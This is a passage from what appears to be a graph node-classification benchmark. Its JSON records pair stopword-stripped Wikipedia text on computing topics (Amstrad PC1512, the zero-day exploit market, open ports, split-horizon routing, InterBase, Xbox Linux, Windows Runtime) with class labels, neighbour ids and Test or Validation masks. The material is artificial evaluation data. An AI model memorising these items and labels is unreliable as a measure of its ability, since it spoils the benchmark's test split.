zones extra precautions must taken international labour organization maritime labour convention 2006 provides comprehensive rights protection work seafarers including requirements minimum age qualifications hours work rest medical care complaint procedures wage payments onboard living arrangements mlc replaced number earlier ilo conventions including ilo147 marpol clc/fund92 relate pollution international convention prevention pollution ships 1973 marpol modified protocol 1978 including annexes i–vi regulates pollution ships including oil air pollution shipboard sewage garbage civil liability oil pollution damage clc international fund compensation oil pollution damage fund92 together provide mechanisms ensure compensation victims oil spills 1978 number european countries agreed hague audit labour conditions board vessels vis-a-vis rules international labour organization end 1982 paris memorandum understanding port state control paris mou established setting port state control standards twenty-six european countries canada several regional memoranda understanding established based paris model including memorandum understanding port state control asia-pacific region typically referred tokyo mou organizations black sea caribbean indian ocean mediterranean latin america tokyo paris organizations generate based deficiencies detentions black- white- grey-lists flag states us coast guard handles port state control inspections us maintains similar target list underperforming flag states least thirteen thirty-five flags convenience listed itf targeted special enforcement countries paris tokyo mous u.s. coast guard united nations conference trade development 2009 report maritime trade states shipowners often register ships foreign flag order employ seafarers developing countries lower wages philippines china supply large percentage maritime labor general major flags convenience particular 2009 flag-states employing highest number expatriate-filipino seafarers panama bahamas liberia marshall islands year 150,000 filipino sailors employed four flags convenience 2006 study united states maritime administration marad sailors people republic china comprised 40 crews surveyed ships flying panamanian flag around 10 flying liberian flag marad report referred china philippines low cost crewing sources seafaring industry often divided two employment groups licensed mariners including deck officers marine engineers mariners required licenses able seamen cooks required certified latter group collectively known unlicensed mariners ratings differences wages seen groups high cost crewing sources united states low cost sources china philippines however salaries flag convenience ships still far higher median salaries non-seafarers countries addition income tax exemption seamen particularly philippines unlicensed mariners 2009 statistics american bureau labor statistics give median earnings able ordinary seamen us 35,810 varying 21,640 10th percentile 55,360 90th percentile compared 2006 statistics international labour organization giving average yearly earnings filipino chinese able seamen around 2,000 3,000 per year php9,900 per month cny3,071 per year among licensed mariners american chief engineers earned median 63,630 varying 35,030 109,310 filipino counterparts averaged 5,500 per year php21,342 per month",
    "neighbors": [
      8672,
      11035,
      676,
      6726,
      10408,
      41,
      8311,
      5147,
      10941
    ],
    "mask": "Test"
  },
  {
    "node_id": 3091,
    "label": 3,
    "text": "PC1512:pc1512 amstrad pc1512 amstrad mostly ibm pc-compatible computer system first manufactured 1986 later succeeded pc1640 launched £499 sold well one first cheap pcs europe significantly helped open european pc market consumers well businesses amstrad advertising pc1512 aimed homes rather offices 1512 influence uk pc magazine pc plus originally targeted amstrad pc 1512 compatibles since home ownership pcs time rare pc1512 shipped 512 kb ram could upgraded 640 kb ram 16 pieces 4164-120 dynamic ram chips 64kbx1 per chip setting jumper video output compatible cga standard extension allowing 16 colours used 640×200 graphics mode cpu pc1512 later pc1640 8 mhz intel 8086 sufficient playing secret monkey island maniac mansion prince persia power supply located monitor made upgrading difficult amstrad licensed ms-dos 3.2 digital research dos plus largely compatible ms-dos included features cp/m ability read cp/m disks one operating systems could used time also licensed gem windowing system supported customized cga hardware 1512 pc1512 followed pc1640 640 kb ram ega-compatible graphics chipset though ecd model could display ega modes either model shipped one two 5¼-inch floppy drives optionally hard drive either 10 20 mb amstrad also attempted expand market share selling computers united states us pc1512 marketed pc6400 included 20 mb hard drive ram upgrade 640 kb pc1512 also sold sinclair pc500 input devices supplied machine notable mouse amstrad mouse incompatible serial mice common time supported games including elite many dos programs problems keyboard sported atari-compatible joystick port digital joysticks joystick movements buttons mapped unused keyboard codes allowing joystick used many dos games written keyboard control series somewhat unusual fact physical volume control internal speaker allowed user make machine beep quietly silently boot time onwards innovation still present modern pcs legacy beeper typically still fixed-volume device whereas ibm pc almost pc compatibles power supply corner main case pc1512 power supply integrated monitor monitor sufficient venting cool convection instead needing fan pc1512 therefore quieter pcs rumours circulated amstrad pc would overheat existing owners would note happen new buyers discouraged result later models cooling fan integrated main case another example rumour suggestion issues 'unshielded power supply monitor affecting optional hard drive could installed back base unit would solved taping tin foil aluminum foil back base unit bottom monitor shield hard drive four discs supplied floppy models five hard drive models amstrad launched amstrad dmp3000 printer 80 character dot matrix printer ibm epson compatibility boasted nlq near letter quality could handle a4 fanfold paper connected computer via parallel port amstrad also launched sm2400 modem quad speed dial-up modem boasted speeds 2400 baud internal isa modem encased plastic could fit amstrad pc1512 pc1640",
    "neighbors": [
      10728,
      7849,
      9166,
      7983,
      1776,
      4727,
      4409,
      8830
    ],
    "mask": "Test"
  },
  {
    "node_id": 3092,
    "label": 4,
    "text": "Market_for_zero-day_exploits:market zero-day exploits market zero-day exploits refers commercial activity happens around trafficking software exploits software vulnerabilities exploits used get remote access stored information information generated real time people use software case countries today given monopolistic nature internet content service providers one specific vulnerability used thousands millions people context criminals become interested vulnerabilities 2014 report mcafee center strategic international studies estimates cost cybercrime cyberespionage somewhere around 160 billion per year worldwide countries appointed public institutions deal issue likely conflict interest government access people information order prevent crime result national security agencies criminals hide certain software vulnerabilities users original developer type vulnerability known zero-day exploit much said academia regular media regulation zero-day exploits market however difficult reach consensus definitions zero-day exploits rather vague applicable one define use certain software malware used addition conflict interest within operations state could prevent regulation make mandatory disclosure zero-days governments face trade-off protecting citizens privacy reporting vulnerabilities private companies one hand undermining communication technologies used targets—who also threaten security public—on protection national security exploitation software vulnerabilities unknown companies public ultimate resource security agencies also compromises safety every single user third party including criminal organizations could making use resource hence users private firms incentives minimize risks associated zero-day exploits former avoid invasion privacy latter reduce costs data breaches include legal processes costs related development solutions fix patch original vulnerability software costs associated loss confidence clients product ablon libicki golay explained great extent inner workings zero-day market main findings separated five components expanded commodity currency marketplace supply demand components relationship pricing described additionally challenge definition given demand component paramount understand nature markets i.e white gray black regulation lack thereof exploits digital products means information goods near-zero marginal production costs however atypical information goods unlike e-books digital videos lose value easy replicate due fact exposed original developer patch vulnerability decreasing value commodity value go zero two reasons 1 distribution patch asymmetric 2 developers could use original bug create variant decreased cost also atypical time-sensitive commodities companies updating software regular basis patch useful lapse versions sometimes vulnerability corrected without external report third even confidential transactions use exploit create dysfunction user end exposing vulnerability leading loss value sense exploits non-excludable non-rivalrous cases transactions typically designed protect identity least one parties involved exchange dependent type market—white markets use traceable money—most purchases made stolen digital funds credit cards cryptocurrencies latter dominant trend last years prices gray market set dollars shown leaks hacking team email archive classically black markets—like illegal weapons narcotics—require huge network trusted parties perform transactions deal-making document forgery financial transfers illicit transport among others difficult enforce legal agreement within networks many criminal organizations recruit members close home proximity element increases cost transaction intermediaries required transnational transactions decreasing overall profit original seller zero-days hand virtual products easily sold without intermediaries internet available technologies strong enough provide anonymity low cost even need intermediaries unwitting data mules used avoid evidence wrongdoing black market lucrative compared gray markets gray markets involve transactions public institutions charge national security usually require use third parties hide traces transactions hacking team archive example contains alleged contracts ecuadorian national secretariat intelligence used two intermediaries robotec theola archive said third-party companies cicom robotec negotiated contracts behalf fbi dea respectively less likely white markets face problem interest hide transaction quite opposite companies actively promote use new patches supply chain complex involves multiple actors organized hierarchies administrators sit top followed technical experts next intermediaries brokers vendors sophisticated finally followed witting mules within chain command one find multiple products zero-day exploits found developed subject matter experts exploits easily commercialized almost person willing enter black market two reasons first devices use outdated deprecated software easily targeted exploits otherwise would completely useless second half-day exploits used graphical interfaces learned freely available tutorials means little expertise required enter market seller coexistence zero-day half-day markets influences resilience black market developers keep moving towards sophisticated end take-downs high organized crime increased suppliers easily replaced people lower levels pyramid take less day find new provider take-down operation easily last months getting top however requires personal connections good reputation digital black market different physical one half-day exploits usually traded easily accessible places zero-days often require double-blind auctions use multiple layers encryption evade law enforcement done forums boards hence transactions occur extremely vetted spaces buys zero-day exploits defines kind market dealing afidler differentiates white gray black markets following market-sizing methodology harvard business school guide differentiate white markets gray markets black markets white markets original developers reward security researchers reporting vulnerabilities average prices reported 2014 less ten thousands dollars special offers 100,000 made certain vulnerabilities based type criticality nature affected software fourteen percent microsoft apple adobe vulnerabilities past ten years came white market programs criminals buy black market however governments occasional buyers offer satisfied gray market find impediments acquire zero-days due international regulations hacking team states website sell products governments countries blacklisted u.s. eu un nato asean although found infringing policy prices usually 10–100 times higher market compared white market changes depending location buyer united states place best prices offered potential sellers allowed sell specific territories like cuba north korea case u.s. likely operate black market well gray markets buyers include clients private sector governments brokers resell vulnerabilities information regarding markets available requests confidential information governments price usually redacted safety purposes information leaked national security agencies private companies i.e finfisher hacking team tsyrklevich reported transactions made hacking team date represents best evidence available inner workings gray market however likely case procedures applied white black markets well typically parties opposed gray markets retailers item market damages profits reputation result usually pressure original manufacturer adjust official channels distribution state also plays important role enforcing penalties case law infringement however zero-day exploit market atypical way operates closer workings black market brokers bounty programs could seen retailers zero-days control whatsoever original producers bad independently discovered different often anonymous actors interest change channel distribution profit white gray markets much less risk former states usually complement labour original manufacturers restrict gray markets play different role zero-day market regular purchasers exploits given secretive nature information security interest disclose information software vulnerabilities interest case aligned criminals seek infiltrate devices acquire information specific targets argued presence intelligence agencies consumers bad could increase price zero-days even legitimate markets provide bargaining power black-market sellers finally private companies unwilling raise prices rewards levels reached gray black markets arguing sustainable defensive markets previous studies shown reward programs cost-effective private firms compared hiring in-house security researchers prize rewards keeps increasing might case anymore 2015 zerodium new start-up focused acquisition high-risk vulnerabilities announced new bounty program published formats required vulnerability submissions criteria determine prices—the popularity complexity affected software quality submitted exploit—and prices represents mixture transparency offered traditional vulnerability reward program high rewards offered gray black markets software developer companies perceived new approach threat primarily due fact high bounties could cause developer tester employees leave day jobs effects market however yet defined nsa criticized buying stockpiling zero-day vulnerabilities keeping secret developing mainly offensive capabilities instead helping patch vulnerabilities",
    "neighbors": [
      5024,
      3843,
      711,
      3944,
      297,
      4813,
      3473,
      4945,
      9460,
      9688,
      4314,
      9082,
      3423
    ],
    "mask": "Test"
  },
  {
    "node_id": 3093,
    "label": 4,
    "text": "CyberHound:cyberhound cyberhound pty ltd formerly netbox blue pty ltd november 2015 australian-owned provider internet email security filtering management solutions founded brisbane john oxnam justin cooke trent davis 1999 privately held company cyberhound head office located fortitude valley queensland australia company provides products internet compliance management security john fison became chairman netbox blue 2006 director shareholder company january 2016 bloomberg acquired ip assets netbox blue bloomberg vault monitor social media trent davis works bloomberg 2008 netbox blue launched internet email filtering appliance specifically education sector technology offers cyberbullying protection category web filtering spam filtering virus protection internet quota management firewall late 2006 netbox blue partnered corporation ibm april 2008 global vendor canon solutions japan signed distribution agreement netbox blue netbox blue agreed provide spamchecker appliance—as known japan—to canon japan customers email filtering content control drop-in appliance result nine months co-development netbox blue canon japan specifically designed sme market japan netbox blue partnered anti-virus software provider eset partnership offered customers eset nod32 antivirus option netbox blue line utm virtualised security products result union small- medium-sized businesses smbs also access netbox blue integrated security management suite june 2012 netbox blue partnered edgewave inc deal enables edgewave provide customers netbox blue social media management technology safechat",
    "neighbors": [
      131,
      4421,
      939,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 3094,
    "label": 5,
    "text": "Open_port:open port security parlance term open port used mean tcp udp port number configured accept packets contrast port rejects connections ignores packets directed called closed port ports integral part internet communication model — channel applications client computer reach software server services web pages ftp require respective ports open server order publicly reachable use terms open closed sometimes misleading though blurs distinction given port reachable unfiltered whether application actually listening port technically given port open context reachable enough communication channel established needs application service listening port accepting incoming packets processing application listening port incoming packets port simply rejected computer operating system ports closed context filtered use firewall firewall filter incoming packets letting packets configured packets directed port firewall configured close simply dropped transit though never existed malicious software acts service waiting connections remote attacker order give information control machine common security practice close unused ports personal computers block public access services might running computer without user knowledge whether due legitimate services misconfigured presence malicious software malicious black hat hackers crackers commonly use port scanning software find ports open unfiltered given computer whether actual service listening port attempt exploit potential vulnerabilities services find",
    "neighbors": [
      2430,
      8386,
      5636,
      8998,
      4490,
      10924,
      6993,
      4435,
      2739,
      4755,
      11413,
      4956,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 3095,
    "label": 5,
    "text": "Split_horizon_route_advertisement:split horizon route advertisement computer networking split-horizon route advertisement method preventing routing loops distance-vector routing protocols prohibiting router advertising route back onto interface learned concept suggested 1974 torsten cegrell originally implemented arpanet inspired swedish network tidas example network node routes packets node b order reach node c links nodes distinct point-to-point links according split-horizon rule node advertise route c namely b c back b surface seems redundant since b never route via node route costs direct route b c however link b c goes b received route c b could end using route via would send packet right back b creating loop count infinity problem split-horizon rule place particular loop scenario happen improving convergence time complex highly-redundant environments split-horizon routing poison reverse variant split-horizon route advertising router actively advertises routes unreachable interface learned setting route metric infinite 16 rip effect announcement immediately remove looping routes propagate network main disadvantage poison reverse significantly increase size routing announcements certain fairly common network topologies allows improvement overall efficiency network case faults split horizon states neighboring router sends route router receiving router propagate route back advertising router interface route poisoning router detects one connected routes failed router poison route assigning infinite metric advertising neighbors router advertises poisoned route neighbors neighbors break rule split horizon send back originator poisoned route called poison reverse order give router enough time propagate poisoned route ensure routing loops occur propagation occurs routers implement hold-down mechanism poison reverse implemented algorithm often used within distance-vector routing use poison reverse solve count-to-infinity problem count infinity problem found distance vector routing basic idea poison reverse make sure path turn back node cost changed within network example would node z routes via node destination x cost z increases count infinity problem occur implement use poison reverse long z routes via node get x z broadcast infinite cost destination x node z routes via following topology assume distance vector table z destination z x z routes via get x cost 3 poison reverse kicks broadcast distance vector neighbors distance tables broadcast 0 1 ∞ x 0 1 3 see distance vector broadcast node end destination x infinity value solves count-to-infinity problem since link z bounce instead directly try another path poison reverse n't always work example link c would fail node c still try go b get destination cause b route loop solve poison reverse though completed implementation distance vector protocol called rip split-horizon method effective simple implement therefore used distance-vector protocols notably used",
    "neighbors": [
      3752,
      6026,
      686,
      3095
    ],
    "mask": "None"
  },
  {
    "node_id": 3096,
    "label": 1,
    "text": "InterBase:interbase interbase relational database management system rdbms currently developed marketed embarcadero technologies interbase distinguished rdbmss small footprint close zero administration requirements multi-generational architecture interbase runs microsoft windows macos linux solaris operating systems well ios android interbase sql-92-compliant relational database supports standard interfaces jdbc odbc ado.net full interbase server installation requires around 40 mb disk minimum interbase client install requires 400 kb disk space interbase run embedded database regular server since interbase xe interbase includes 256bit aes strength encryption offers full database table column data encryption assists data controllers conform data protection laws around at-rest data providing separated encryption db access database ensuring database file encrypted wherever resides separation encryption also enables developers develop application rather worry data visible specific user login avoid blocking updates interbase uses multiversion concurrency control instead locks transaction create version record upon write step update fail rather blocked initially interbase also uses multi-generational records implement rollbacks rather transaction logs certain operations difficult implement multi-generational architecture hence perform slowly relative traditional implementation one example sql codice_1 verb even index available column columns included codice_1 records must visited order see visible current transaction isol interbase software—originally known groton database systems—was born ann harrison spare room ann first junior programmer company worked nearly every component version 0 3.3 jim starkey working dec datatrieve 4th generation language 4gl product came idea system manage concurrent changes many users idea dramatically simplified existing problems locking proving serious problem new relational database systems developed time starkey however idea spun original relational database project another group turf war ensued starkey left company shipping first version rdb/eln product although interbase implementation much similar system described reed mit dissertation database existed time starkey knew bernstein previous position computer corporation america later dec starkey stated arrived idea multiversion concurrency control independently comment starkey says inspiration multi-generational concurrency control database system done prime supported page level snapshots intention feature give reader consistent view database without blocking writers idea intrigued useful characteristic database system heard local workstation vendor apollo computer looking database offering unix machines agreed fund development encouragement formed groton database systems named town groton massachusetts located labor day 1984 started work would eventually released interbase 1986 apollo suffered corporate shakeup decided exit software business time product making money 1986 1991 product gradually sold ashton-tate makers famous dbase time purchasing various database companies order fill portfolio company soon trouble borland purchased ashton-tate 1991 acquiring interbase part deal early 2000 borland announced interbase would released open-source began negotiations spin separate company manage product people run new company borland could agree terms separation interbase remained borland product source code interbase version 6 released variant mozilla public license mid-2000 interbase division borland new management company released proprietary version interbase version 6 6.5 borland released several updates open source code announcing would longer actively develop open source project firebird open source fork interbase 6 code however remains active development 2001 backdoor discovered fixed software present versions since 1994 february 8 2006 borland announced intention sell line development tool products including interbase delphi jbuilder tools instead selling divisions borland spun subsidiary 14 november 2006 interbase along ide tools delphi jbuilder included new company product lineup 7 may 2008 borland embarcadero technologies announced embarcadero signed definitive asset purchase agreement purchase codegear acquisition approximately 24.5 million closed 30 june 2008 end 2002 borland released interbase version 7 featuring support smp enhanced support monitoring control server administrators borland released interbase 7.1 june 2003 7.5 december 2004 7.5.1 june 1 2005 september 2006 borland announced availability interbase 2007 new features include point time recovery via journaling also allows recoverability without performance penalty synchronous writes incremental backup batch statement operations new unicode character encodings new odbc driver september 2008 embarcadero announced availability interbase 2009 new features include full database encryption selective column-level data encryption over-the-wire encryption offering secure tcp/ip communication via secure socket layer ssl september 2010 embarcadero announced availability interbase xe new features include 64 bit client server improved security improved scalability support dynamic sql stored procedures optimized performance large objects stream methods 2013/2014 embarcadero added ios android available supported platforms interbase xe3 additionally interbase iblite released run time royalty free edition interbase covering windows macos ios android december 2014 embarcadero released interbase xe7 offering brand new patent pending change tracking technology called change views. added ubuntu certified linux platforms also added 64bit linux support additional 64bit transaction id introduced new distinguished data dumps enabling rapid updates read copies master database march 2017 embarcadero released interbase 2017 interbase 2017 includes interbase togo linux server wide monitoring support interbase server number language enhancements including derived tables common table expressions truncate table faster data removal enhancements change views expanding subscription table wide scope new transaction isolation levels transaction wait time management",
    "neighbors": [
      6797,
      10389,
      7588,
      10921,
      5549,
      9389,
      7983,
      9263,
      10286,
      3636,
      823,
      5953,
      9286,
      4680,
      9177,
      10201,
      10459,
      7654,
      1383,
      5612,
      7022,
      5492,
      9335,
      11515
    ],
    "mask": "None"
  },
  {
    "node_id": 3097,
    "label": 2,
    "text": "Lightweight_Portable_Security:lightweight portable security lightweight portable security lps linux livecd liveusb developed publicly distributed united states department defense ’ air force research laboratory designed serve secure end node run almost intel-based computer pc mac lps boots ram creating pristine non-persistent end node supports dod-approved common access card cac readers required authenticating users pki-authenticated gateways access internal dod networks lps turns untrusted system home computer trusted network client trace work activity malware written local computer hard drive september 2011 version 1.2.5 lps public distribution includes smart card-enabled firefox browser supporting dod cac personal identity verification piv cards pdf text viewer java file browser remote desktop software citrix microsoft vmware view ssh client public edition encryption wizard ability use usb flash drives public deluxe version also available adds libreoffice adobe reader software lps encryption wizard initiated air force research laboratory anti-tamper software protection initiative program started 2001 2016 program ending lps encryption wizard moved trusted end node security program office lps version 1.7 rebranded trusted end node security tens encryption wizard retained name received tens logo version 3.4.11 nevertheless early 2019 site still uses lps name many places lps comes encryption wizard ew simple strong file folder encryptor protection sensitive unclassified information fouo privacy act cui etc. written java ew encrypts file types data rest data transit protection without installation elevated privileges ew runs windows mac linux solaris computers support java software platform simple drag drop interface ew offers 128-bit 256-bit aes encryption sha-256 hashing rsa signatures searchable metadata archives compression secure deleting pki/cac/piv support encryption keyed passphrase pki certificate ew gots—u.s government invented owned supported software—and comes three versions public version uses standard java cryptographic library unified version uses fip-140-2 certified crypto licensed legion bouncy castle government-only version uses fips-140-2 certified crypto stack licensed rsa security three versions interoperate web site distribution lps-public served https uses tls certificate signed certificate authority managed directly department defense defense information systems agency ca trusted non-dod operating systems browsers visiting site downloading iso generate browser security warning indicating certificate trusted military-issued devices already include certificate authority list trusted cas see errors article incorporates text us department defense spi web site",
    "neighbors": [
      10016,
      6371,
      420,
      517,
      10341,
      11432,
      2154,
      5677,
      7534,
      10831,
      5363,
      8627,
      5109,
      5078,
      823,
      7483,
      4637
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3098,
    "label": 3,
    "text": "Besta_(computer):besta computer besta беста — soviet unix-based graphics workstation production started 1988 1,000 besta workstations produced several modifications computer besta-88 motorola 68020 cpu vme bus operating system legally ported version unix system v release 3.2 also known bestix",
    "neighbors": [
      11169,
      6187,
      5492,
      7286
    ],
    "mask": "Test"
  },
  {
    "node_id": 3099,
    "label": 4,
    "text": "PTK_Forensics:ptk forensics ptk forensics ptk non-free commercial gui old versions digital forensics tool sleuth kit tsk also includes number software modules investigating digital media software developed anymore ptk runs gui interface sleuth kit acquiring indexing digital media investigation indexes stored sql database searching part digital investigation ptk calculates hash signature using sha-1 md5 acquired media verification consistency purposes",
    "neighbors": [
      7968,
      4834,
      5475,
      5284,
      2437,
      3462,
      7525,
      8582,
      8644,
      9319,
      6475,
      11182,
      830,
      4049,
      4789,
      8635,
      2494
    ],
    "mask": "Test"
  },
  {
    "node_id": 3100,
    "label": 6,
    "text": "Market_fragmentation:market fragmentation fragmentation technology market happens market composed multiple highly-incompatible technologies technology stacks forcing prospective buyers single product commit entire product ecosystem rather maintaining free choice complementary products services two common varieties fragmentation market fragmentation version fragmentation fragmentation opposite solved standardization market fragmentation happens multiple competing firms offer highly-incompatible technologies technology stacks likely leading vendor lock-in version fragmentation happens firm offers multiple incompatible versions variations single product either tandem time result accumulated changes product specification term used android development community android fragmentation fragmentation within android variety versions android platform combined mixture hardware result inability devices properly run certain applications despite google upgrading android operating system version 4.4 also known kitkat users continued use earlier versions operating system primarily gingerbread 0.3 share cause primarily hardware manufacturers devices able upgrade later operating system number reasons result applications written one version operate consistently vice versa august 2010 developers opensignal wireless crowd-sourcing app detected 3,997 distinct values android.build.model among users app variable represents device model though may altered adding custom rom opensignal acknowledged made problematic develop apps wide variety models allows android enter markets developers placed blame google hardware manufacturers google blamed software developers staying within guidelines terms conditions issue fragmentation forced google add prohibition terms conditions software development kit developers must accept developing android operating system example opensignal testdroid studies found oems fragment android ecosystem significantly google",
    "neighbors": [
      8296,
      1516,
      1069,
      6265,
      8285
    ],
    "mask": "Test"
  },
  {
    "node_id": 3101,
    "label": 2,
    "text": "Xbox_Linux:xbox linux xbox linux project ported linux operating system xbox video game console xbox uses digital signature system prevent public running unsigned code one must either use modchip softmod originally modchips option however later demonstrated tsop chip xbox bios held may reflashed way one may flash cromwell bios developed legally xbox linux project catalyzed large cash prize first team provide possibility booting linux xbox without need hardware hack numerous software-only hacks also found example buffer overflow found game allowed booting linux loader xbeboot straight save game xbox essentially pc custom 733 mhz intel pentium iii processor 10 gb hard drive 8 gb accessible user 64mb ram although earlier boxes upgradable 128mb 4 usb ports controller ports actually usb 1.1 ports modified connector specifications enough run several readily available linux distributions xbox-linux home page xbox legacy-free pc microsoft consists intel celeron 733 mhz cpu nvidia geforce 3mx 64 mb ram 8/10 gb hard disk dvd drive 10/100 ethernet every pc run linux it. xbox linux full desktop computer mouse keyboard web/email box connected tv server router node cluster either dual-boot use linux latter case replace ide devices yes connect xbox vga monitor. xbox linux installed act full desktop computer mouse keyboard web/email box connected television server router node cluster one either dual-boot use linux latter case one replace ide devices one also connect xbox vga monitor converter needed use keyboards/mice controller ports however difficult xbox uses standard usb proprietary port currently distributions xbox linux run version 1.6 xbox third newest version including 1.6b xboxes modchips cromwell bios installed run distributions softmod mainly due issues video chip used version 1.6 xboxes developed exclusively microsoft source code available time cause significant overscan four sides screen different kernel original loaded one popular ways installing xbox linux softmod require modchip use xbox linux softmod utilizes save exploit found original run mechassault splinter cell tony hawk pro skater 4 method involves loading hacked save file transferred xbox hard drive save file loaded mechinstaller initiated xbox live option dashboard replaced new linux option rebooting system another softmod used hotswap exploit unlock xbox hard drive long enough allow one modify also way completely replace xbox stock bios cromwell bios completely legal solely linux xbox however tsop bios chip flashed cromwell xbox longer play xbox games run native xbox executables .xbe files akin .exe windows several distributions xbox linux based pc linux distributions",
    "neighbors": [
      1474,
      6436,
      3911,
      1515,
      7983,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 3102,
    "label": 2,
    "text": "Windows_Runtime:windows runtime windows runtime winrt platform-agnostic application architecture first introduced windows 8 windows server 2012 2012 winrt supports development c++/winrt standard c++ c++/cx component extensions language based c++ javascript-typescript managed code languages c visual basic .net vb.net winrt applications natively support x86 arm processors may run inside sandboxed environment allow greater security stability winrt components designed interoperability multiple languages apis mind including native managed scripting languages windows phone 8.1 uses version windows runtime named windows phone runtime enables developing applications c vb.net windows runtime components c++/cx winrt implemented programming language c++ object-oriented design predecessor windows api win32 api written mostly language c. unmanaged code application programming interface api based component object model com allows interfacing multiple languages com however api definitions stored codice_1 files encoded ecma 335 metadata format .net framework also uses modifications common metadata format allows significantly less overhead invoking winrt .net applications relative p/invoke much simpler syntax new c++/cx component extensions language borrows c++/cli syntax allows writing consuming winrt components less glue code visible programmer relative classic com programming c++ imposes fewer restrictions relative c++/cli mixing types component extensions c++/cx recommended use api-boundary purposes regular c++ com-specific discipline also used program winrt components help windows runtime c++ template library wrl similar purpose active template library provides com winrt applications run within sandbox need explicit user approval access critical os features underlying hardware file access restricted several predetermined locations directories documents pictures winrt applications windows rt windows 8 beyond packaged codice_2 file format based upon open packaging conventions uses zip format added xml files winrt applications distributed mostly application store named microsoft store winrt software termed windows store apps downloaded purchased users winrt apps sideloaded outside windows store windows 8 rt systems part windows domain equipped special activation key obtained microsoft major departure win32 similarly .net framework 4.5 apis expected take significant time complete implemented asynchronous application dispatches api call returns immediately freeing application perform tasks waiting results asynchronous model requires new programming language constructs keyword codice_3 operator codice_4 c visual basic class codice_5 method codice_6 c++ provided winrt software development kit sdk keyword codice_7 function codice_8 javascript-html5 similar codice_9/codice_10 used exception handling parts api needing asynchronous access include on-screen messages dialogs file access internet connectivity sockets streams devices services calendar contacts appointments metadata describes code written winrt platform defines programming model makes possible write object-oriented code shared across programming languages enables services like reflection herb sutter c++ expert microsoft explained session c++ 2011 build conference winrt metadata cli metadata native code i.e. processor-specific machine code contain metadata stored separate winmd-files reflected like ordinary cli assemblies cli metadata code written native winrt languages used managed cli languages winrt rich object-oriented class-based type system built metadata supports constructs corresponding constructs .net framework classes methods properties delegates events one major additions winrt relative com cross-application binary interface abi .net-style generics c++/cx declared using keyword codice_11 syntax similar keyword codice_12 winrt classes ref classes also genericized using c++ templates template instantiations exported .winmd metadata name mangling unlike winrt generics preserve genericity metadata winrt also provides library generic containers parallel c++ standard library reciprocal back-and-forth conversion functions consumption winrt collections .net languages e.g. c vb javascript transparent c++ automated mappings natural equivalents occurring behind scenes authoring winrt component managed language extra com-style rules must followed e.g .net framework collection types declared return types winrt interfaces implement used component boundary classes compiled target winrt called winrt components classes written supported language supported platform key metadata metadata makes possible interface component winrt language runtime requires winrt components built .net framework use defined interface types .net type interfaces automatically map first named inheritance yet supported managed winrt components except xaml classes programs libraries targeted winrt runtime created consumed several platforms programming languages notably c/c++ either language extensions offering first-class support winrt concepts lower-level template library allowing write code standard c++ .net c visual basic .net vb.net javascript made possible metadata winrt terminology language binding termed language projection native c++ first-class citizen winrt platform version 10.0.17134.0 windows 10 version 1803 windows sdk contains c++/winrt c++/winrt entirely standard modern c++17 language projection windows runtime winrt apis implemented header-file-based library designed provide first-class access modern windows api c++/winrt windows runtime apis authored consumed using standards-compliant c++17 compiler winrt native platform supports native standard c++ code c++ developer reuse existing native c/c++ libraries c++/winrt language extensions prior c++/winrt officially released windows sdk october 2016 microsoft offered github c++/winrt rely c++/cx code result producing smaller binaries faster code two legacy options using winrt c++ wrl atl-style template library c++/cx c++ component extensions resembles c++/cli internal consumption requirements microsoft wrl exception-free meaning return-value discipline hresult-based like com c++/cx hand wraps-up calls winrt code error checking throws exceptions appropriate c++/cx several extensions enable integration platform type system syntax resembles one c++/cli although produces native although standard code metadata integrates runtime example winrt objects may allocated codice_13 counterpart codice_14 c++/cli hat operator codice_15 retains meaning however case caller callee written c++ living process hat reference simply pointer vptr virtual method table vtable vmt along c++/cx relative traditional c++ com programming partial classes inspired .net allow instance xaml code translated c++ code tools combined human-written code produce complete class allowing clean separation machine-generated human-edited parts class implementation different files .net framework common language runtime clr integrated winrt subplatform influenced set standards ecosystem metadata format libraries clr provides services like jit-compilation code garbage collection winrt applications using .net languages use new windows runtime xaml framework primarily written c vb.net first time xaml native code using c++/cx although yet officially supported programs also written .net languages classes defined winrt components built managed .net languages must declared codice_16 derived however non-sealed winrt classes defined elsewhere inherited .net virtual methods overridden inherited managed class must still sealed members interface another language must signature winrt types managed type convertible winrt applications also coded using html javascript code-behind run using trident rendering engine chakra javascript engine also used internet explorer coding winrt app javascript features adapted follow javascript naming conventions namespaces also mapped javascript objects winrt comes application programming interface api form class library exposes features windows 8 developer like immersive interface api accessible consumable supported language windows runtime classes set sdks provide access functionality xaml parser camera function sdks implemented native c/c++ libraries unmanaged naming conventions components classes members api heavily influenced .net naming conventions uses camel case specifically pascalcase microsoft recommends users follow rules case others given conventions projected differently languages like javascript converts conventions way around give native consistent experience regardless programming language since windows runtime projected various languages restrictions fundamental data types exist host languages programmers must careful behavior types used public access method parameters method return values properties etc. starting windows phone 8 possible develop apps using version windows runtime called windows phone runtime wprt although wp8 brought limited support platform eventually converge windows 8.1 windows phone 8.1 windows phone 8 limited support developing consuming windows runtime components windows phone runtime many windows runtime apis windows 8 handle core operating system functions ported windows phone 8 support developing native games using c++/cx directx added request game development industry however windows phone xaml framework still based microsoft silverlight framework windows phone 7 backward compatibility thus xaml development impossible c++/cx development using either html5 winjs unsupported windows phone 8 windows runtime support windows phone 8.1 converges windows 8.1 release brings full windows runtime api platform including support windows runtime xaml framework language bindings c++/cx html5-javascript also project type called universal apps enable apps share code across 8.1 versions windows phone windows windows phone 8 silverlight framework updated exploit new features windows runtime windows phone runtime uses appx package format windows 8 formerly using silverlight xap",
    "neighbors": [
      11270,
      5643,
      4624,
      537,
      540,
      9762,
      8227,
      8740,
      1577,
      10281,
      2101,
      10812,
      3648,
      8262,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      2146,
      3170,
      8296,
      8299,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      5754,
      4731,
      7290,
      10879,
      8841,
      6797,
      2193,
      9874,
      10388,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      5300,
      7351,
      1724,
      2749,
      10428,
      9921,
      2244,
      8391,
      200,
      9420,
      9943,
      2782,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      9964,
      10991,
      10993,
      242,
      3834,
      1791,
      2304,
      8959,
      11519,
      3856,
      9490,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      11559,
